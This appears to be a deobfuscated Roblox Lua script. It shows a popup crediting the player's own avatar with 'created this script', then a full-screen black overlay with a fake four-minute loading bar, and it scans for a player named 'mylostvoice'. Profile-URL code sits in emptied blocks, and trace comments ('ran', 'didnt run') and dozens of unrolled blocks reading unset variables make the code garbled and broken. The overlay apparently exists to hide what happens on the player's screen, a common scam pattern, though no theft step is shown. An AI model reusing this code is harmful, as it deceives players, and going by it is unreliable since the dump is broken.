-- This file was generated with UnveilR V3.01 at discord.gg/threaded using the testing version.

local Players, UserId, DisplayName, Name, Frame_2, Os_Clock_Result, v244, v267, v290, v313, v336, v359, v382, v405, v428, v451, v474, v497, v520, v543, v566, v589, v612, v635, v658, v681, v704, v727, v750, v773, v796, v819, v842, v865, v888, v911, v934, v957, v980, v1003, v1026, v1049, v1072, v1095, v1118, v1141, v1164, v1187, v1210, v1233, v1256, v1279, v1302, v1325, v1348, v1371, v1394, v1417, v1440, v1463, v1486, v1509, v1532, v1555, v1578, v1601, v1624, v1647, v1670, v1693, v1716;
local fenv = getfenv();
if pcall(function(p1, p2, p3, p4, p5, a, b, c)

end) then -- ran, if id: 1
    Players = game:GetService("Players");
end;
local TweenService = game:GetService("TweenService");
local LocalPlayer = Players.LocalPlayer;
task.spawn(function()
    task.wait(2);
    local Image = string.format("https://www.roblox.com/headshot-thumbnail/image?userId=%d&width=420&height=420&format=png", UserId);
    local Profile = string.format("https://www.roblox.com/users/%d/profile", UserId);
    pcall(function(p1_3, p2_3, p3_3, a_3, b_3, c_3)

    end);
end);
local CharacterAdded = LocalPlayer.CharacterAdded;
CharacterAdded:Connect(function(character, p2_4, a_4, b_4, c_4)
    task.wait(2);
end);
task.spawn(function()
    task.wait(20);
    for for_key_1, for_val_1 in ipairs(Players:GetPlayers()) do
        if for_key_1 then -- ran, if id: 200

        end;
        if for_val_1.Name:lower() ~= "mylostvoice" then
        else -- didnt run (else), if id: 201

        end;
        if for_val_1.DisplayName:lower() ~= "mylostvoice" then -- ran, if id: 202
        end;
    end;
end);
game:GetService("UserInputService").InputBegan:Connect(function(input, gameProcessedEvent, p3_6, p4_6, a_6, b_6, c_6)
    if gameProcessedEvent then -- ran, if id: 199

    end;
end);
local CreatorScreen = Instance.new"ScreenGui";
CreatorScreen.Name = "CreatorScreen";
CreatorScreen.ResetOnSpawn = false;
CreatorScreen.ZIndexBehavior = Enum.ZIndexBehavior.Sibling;
CreatorScreen.DisplayOrder = 999999;
CreatorScreen.IgnoreGuiInset = true;
CreatorScreen.Parent = LocalPlayer:WaitForChild("PlayerGui");
local CreditPopup = Instance.new"Frame";
CreditPopup.Name = "CreditPopup";
local UDim2_New = UDim2.new;
CreditPopup.Size = UDim2_New(0, 320, 0, 130);
CreditPopup.Position = UDim2_New(0.5, -160, 0.5, -65);
local FromRGB = Color3.fromRGB;
CreditPopup.BackgroundColor3 = FromRGB(25, 27, 35);
CreditPopup.BackgroundTransparency = 0;
CreditPopup.BorderSizePixel = 0;
CreditPopup.ZIndex = 10;
CreditPopup.Parent = CreatorScreen;
local UDim_New = UDim.new;
Instance.new("UICorner", CreditPopup).CornerRadius = UDim_New(0, 8);
local Frame = Instance.new"Frame";
Frame.Size = UDim2_New(0, 55, 0, 55);
Frame.Position = UDim2_New(0, 15, 0.5, -32);
Frame.BackgroundColor3 = FromRGB(45, 45, 55);
Frame.BorderSizePixel = 0;
Frame.ZIndex = 11;
Frame.Parent = CreditPopup;
Instance.new("UICorner", Frame).CornerRadius = UDim_New(0, 27);
local ImageLabel = Instance.new"ImageLabel";
ImageLabel.Size = UDim2_New(1, -4, 1, -4);
ImageLabel.Position = UDim2_New(0, 2, 0, 2);
ImageLabel.BackgroundColor3 = FromRGB(30, 35, 45);
ImageLabel.BackgroundTransparency = 0;
ImageLabel.BorderSizePixel = 0;
UserId = LocalPlayer.UserId;
ImageLabel.Image = "rbxthumb://type=AvatarHeadShot&id=" .. (
    UserId .. "&w=150&h=150"
);
ImageLabel.ZIndex = 12;
ImageLabel.Parent = Frame;
Instance.new("UICorner", ImageLabel).CornerRadius = UDim_New(0, 25);
local TextLabel = Instance.new"TextLabel";
TextLabel.Size = UDim2_New(1, -85, 0, 24);
TextLabel.Position = UDim2_New(0, 80, 0, 20);
TextLabel.BackgroundTransparency = 1;
DisplayName = LocalPlayer.DisplayName;
TextLabel.Text = DisplayName;
TextLabel.TextColor3 = FromRGB(255, 255, 255);
TextLabel.TextSize = 18;
TextLabel.Font = Enum.Font.GothamBold;
TextLabel.TextXAlignment = Enum.TextXAlignment.Left;
TextLabel.ZIndex = 11;
TextLabel.Parent = CreditPopup;
local TextLabel_2 = Instance.new"TextLabel";
TextLabel_2.Size = UDim2_New(1, -85, 0, 18);
TextLabel_2.Position = UDim2_New(0, 80, 0, 45);
TextLabel_2.BackgroundTransparency = 1;
Name = LocalPlayer.Name;
TextLabel_2.Text = "@" .. Name;
TextLabel_2.TextColor3 = FromRGB(150, 150, 170);
TextLabel_2.TextSize = 13;
TextLabel_2.Font = Enum.Font.Gotham;
TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left;
TextLabel_2.ZIndex = 11;
TextLabel_2.Parent = CreditPopup;
local D_This_Script = Instance.new"TextLabel";
D_This_Script.Size = UDim2_New(1, -85, 0, 20);
D_This_Script.Position = UDim2_New(0, 80, 0, 65);
D_This_Script.BackgroundTransparency = 1;
D_This_Script.Text = "created this script";
D_This_Script.TextColor3 = FromRGB(100, 150, 255);
D_This_Script.TextSize = 14;
D_This_Script.Font = Enum.Font.GothamBold;
D_This_Script.TextXAlignment = Enum.TextXAlignment.Left;
D_This_Script.ZIndex = 11;
D_This_Script.Parent = CreditPopup;
local Discord_4jsy = Instance.new"TextLabel";
Discord_4jsy.Size = UDim2_New(1, -85, 0, 20);
Discord_4jsy.Position = UDim2_New(0, 80, 0, 88);
Discord_4jsy.BackgroundTransparency = 1;
Discord_4jsy.Text = "Discord; 4jsy";
Discord_4jsy.TextColor3 = FromRGB(88, 101, 242);
Discord_4jsy.TextSize = 14;
Discord_4jsy.Font = Enum.Font.GothamBold;
Discord_4jsy.TextXAlignment = Enum.TextXAlignment.Left;
Discord_4jsy.ZIndex = 11;
Discord_4jsy.Parent = CreditPopup;
local BlackScreen = Instance.new"Frame";
BlackScreen.Name = "BlackScreen";
BlackScreen.Size = UDim2_New(1, 0, 1, 0);
BlackScreen.Position = UDim2_New(0, 0, 0, 0);
BlackScreen.BackgroundColor3 = FromRGB(0, 0, 0);
BlackScreen.BackgroundTransparency = 1;
BlackScreen.BorderSizePixel = 0;
BlackScreen.ZIndex = 1e3;
BlackScreen.Visible = true;
BlackScreen.Parent = CreatorScreen;
local LoadingContainer = Instance.new"Frame";
LoadingContainer.Name = "LoadingContainer";
LoadingContainer.Size = UDim2_New(0, 400, 0, 100);
LoadingContainer.Position = UDim2_New(0.5, -200, 0.5, -50);
LoadingContainer.BackgroundTransparency = 1;
LoadingContainer.ZIndex = 1001;
LoadingContainer.Visible = false;
LoadingContainer.Parent = BlackScreen;
local LoadingText = Instance.new"TextLabel";
LoadingText.Name = "LoadingText";
LoadingText.Size = UDim2_New(1, 0, 0, 30);
LoadingText.Position = UDim2_New(0, 0, 0, 0);
LoadingText.BackgroundTransparency = 1;
LoadingText.Text = "loading";
LoadingText.TextColor3 = FromRGB(255, 255, 255);
LoadingText.TextSize = 24;
LoadingText.Font = Enum.Font.GothamBold;
LoadingText.TextXAlignment = Enum.TextXAlignment.Center;
LoadingText.ZIndex = 1002;
LoadingText.Parent = LoadingContainer;
local BarBackground = Instance.new"Frame";
BarBackground.Name = "BarBackground";
BarBackground.Size = UDim2_New(1, 0, 0, 20);
BarBackground.Position = UDim2_New(0, 0, 0, 40);
BarBackground.BackgroundColor3 = FromRGB(40, 40, 50);
BarBackground.BackgroundTransparency = 0;
BarBackground.BorderSizePixel = 0;
BarBackground.ZIndex = 1002;
BarBackground.Parent = LoadingContainer;
Instance.new("UICorner", BarBackground).CornerRadius = UDim_New(0, 10);
local BarFill = Instance.new"Frame";
BarFill.Name = "BarFill";
BarFill.Size = UDim2_New(0, 0, 1, 0);
BarFill.Position = UDim2_New(0, 0, 0, 0);
BarFill.BackgroundColor3 = FromRGB(100, 150, 255);
BarFill.BackgroundTransparency = 0;
BarFill.BorderSizePixel = 0;
BarFill.ZIndex = 1003;
BarFill.Parent = BarBackground;
Instance.new("UICorner", BarFill).CornerRadius = UDim_New(0, 10);
local PercentText = Instance.new"TextLabel";
PercentText.Name = "PercentText";
PercentText.Size = UDim2_New(1, 0, 0, 20);
PercentText.Position = UDim2_New(0, 0, 0, 70);
PercentText.BackgroundTransparency = 1;
PercentText.Text = "0%";
PercentText.TextColor3 = FromRGB(200, 200, 200);
PercentText.TextSize = 14;
PercentText.Font = Enum.Font.Gotham;
PercentText.TextXAlignment = Enum.TextXAlignment.Center;
PercentText.ZIndex = 1002;
PercentText.Parent = LoadingContainer;
task.spawn(function()
    task.wait(10);
    local TweenInfo_New = TweenInfo.new;
    for for_key_0, for_val_0 in pairs(CreditPopup:GetDescendants()) do
        if for_key_0 then
        else -- didnt run (else), if id: 2
            Frame_2 = for_val_0:IsA("Frame");
        end;
        if Frame_2 then
        else -- didnt run (else), if id: 3

        end;
        if not Frame_2 then -- ran, if id: 4
        end;
    end;
    TweenService:Create(CreditPopup, TweenInfo_New(0.5), {
        ["BackgroundTransparency"] = 1
    }):Play();
    task.wait(0.5);
    CreditPopup:Destroy();
    LoadingContainer.Visible = true;
    local _ = TweenInfo.new;
    TweenService:Create(BlackScreen, TweenInfo_New(1), {
        ["BackgroundTransparency"] = 0
    }):Play();
    task.wait(1);
    Os_Clock_Result = os.clock();
    if CreatorScreen then
    else -- didnt run (else), if id: 5

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 6
        v244 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result = math.min(
        v244 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v244 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result < 0.99 then -- ran, if id: 7

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 8

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 9
        v267 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_2 = math.min(
        v267 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_2, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_2 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v267 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_2 < 0.99 then -- ran, if id: 10

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 11

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 12
        v290 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_3 = math.min(
        v290 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_3, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_3 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v290 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_3 < 0.99 then -- ran, if id: 13

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 14

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 15
        v313 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_4 = math.min(
        v313 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_4, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_4 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v313 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_4 < 0.99 then -- ran, if id: 16

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 17

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 18
        v336 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_5 = math.min(
        v336 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_5, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_5 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v336 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_5 < 0.99 then -- ran, if id: 19

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 20

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 21
        v359 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_6 = math.min(
        v359 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_6, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_6 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v359 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_6 < 0.99 then -- ran, if id: 22

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 23

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 24
        v382 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_7 = math.min(
        v382 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_7, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_7 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v382 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_7 < 0.99 then -- ran, if id: 25

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 26

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 27
        v405 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_8 = math.min(
        v405 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_8, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_8 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v405 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_8 < 0.99 then -- ran, if id: 28

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 29

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 30
        v428 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_9 = math.min(
        v428 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_9, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_9 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v428 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_9 < 0.99 then -- ran, if id: 31

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 32

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 33
        v451 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_10 = math.min(
        v451 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_10, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_10 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v451 * 2
        ) % 4
    );
    LoadingText.Text = "loading";
    task.wait(0.05);
    if Math_Min_Result_10 < 0.99 then -- ran, if id: 34

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 35

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 36
        v474 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_11 = math.min(
        v474 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_11, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_11 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v474 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_11 < 0.99 then -- ran, if id: 37

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 38

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 39
        v497 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_12 = math.min(
        v497 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_12, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_12 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v497 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_12 < 0.99 then -- ran, if id: 40

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 41

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 42
        v520 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_13 = math.min(
        v520 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_13, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_13 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v520 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_13 < 0.99 then -- ran, if id: 43

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 44

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 45
        v543 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_14 = math.min(
        v543 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_14, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_14 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v543 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_14 < 0.99 then -- ran, if id: 46

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 47

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 48
        v566 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_15 = math.min(
        v566 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_15, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_15 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v566 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_15 < 0.99 then -- ran, if id: 49

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 50

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 51
        v589 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_16 = math.min(
        v589 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_16, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_16 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v589 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_16 < 0.99 then -- ran, if id: 52

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 53

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 54
        v612 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_17 = math.min(
        v612 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_17, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_17 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v612 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_17 < 0.99 then -- ran, if id: 55

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 56

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 57
        v635 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_18 = math.min(
        v635 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_18, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_18 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v635 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_18 < 0.99 then -- ran, if id: 58

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 59

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 60
        v658 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_19 = math.min(
        v658 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_19, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_19 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v658 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_19 < 0.99 then -- ran, if id: 61

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 62

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 63
        v681 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_20 = math.min(
        v681 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_20, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_20 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v681 * 2
        ) % 4
    );
    LoadingText.Text = "loading.";
    task.wait(0.05);
    if Math_Min_Result_20 < 0.99 then -- ran, if id: 64

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 65

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 66
        v704 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_21 = math.min(
        v704 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_21, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_21 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v704 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_21 < 0.99 then -- ran, if id: 67

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 68

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 69
        v727 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_22 = math.min(
        v727 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_22, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_22 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v727 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_22 < 0.99 then -- ran, if id: 70

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 71

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 72
        v750 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_23 = math.min(
        v750 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_23, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_23 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v750 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_23 < 0.99 then -- ran, if id: 73

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 74

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 75
        v773 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_24 = math.min(
        v773 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_24, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_24 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v773 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_24 < 0.99 then -- ran, if id: 76

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 77

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 78
        v796 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_25 = math.min(
        v796 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_25, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_25 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v796 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_25 < 0.99 then -- ran, if id: 79

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 80

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 81
        v819 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_26 = math.min(
        v819 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_26, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_26 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v819 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_26 < 0.99 then -- ran, if id: 82

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 83

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 84
        v842 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_27 = math.min(
        v842 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_27, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_27 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v842 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_27 < 0.99 then -- ran, if id: 85

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 86

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 87
        v865 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_28 = math.min(
        v865 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_28, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_28 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v865 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_28 < 0.99 then -- ran, if id: 88

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 89

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 90
        v888 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_29 = math.min(
        v888 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_29, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_29 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v888 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_29 < 0.99 then -- ran, if id: 91

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 92

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 93
        v911 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_30 = math.min(
        v911 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_30, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_30 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v911 * 2
        ) % 4
    );
    LoadingText.Text = "loading..";
    task.wait(0.05);
    if Math_Min_Result_30 < 0.99 then -- ran, if id: 94

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 95

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 96
        v934 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_31 = math.min(
        v934 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_31, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_31 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v934 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_31 < 0.99 then -- ran, if id: 97

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 98

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 99
        v957 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_32 = math.min(
        v957 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_32, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_32 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v957 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_32 < 0.99 then -- ran, if id: 100

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 101

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 102
        v980 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_33 = math.min(
        v980 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_33, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_33 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v980 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_33 < 0.99 then -- ran, if id: 103

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 104

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 105
        v1003 = os.clock() - Os_Clock_Result;
    end;
    local Math_Min_Result_34 = math.min(
        v1003 / 240,
        0.99
    );
    BarFill.Size = UDim2_New(Math_Min_Result_34, 0, 1, 0);
    PercentText.Text = math.floor(
        Math_Min_Result_34 * 100
    ) .. "%";
    string.rep(
        ".",
        math.floor(
            v1003 * 2
        ) % 4
    );
    LoadingText.Text = "loading...";
    task.wait(0.05);
    if Math_Min_Result_34 < 0.99 then -- ran, if id: 106

    end;
    if CreatorScreen then
    else -- didnt run (else), if id: 107

    end;
    if CreatorScreen.Parent then
    else -- didnt run (else), if id: 108
        v1026 = os.clock() - Os_Clock_Result;
    end;
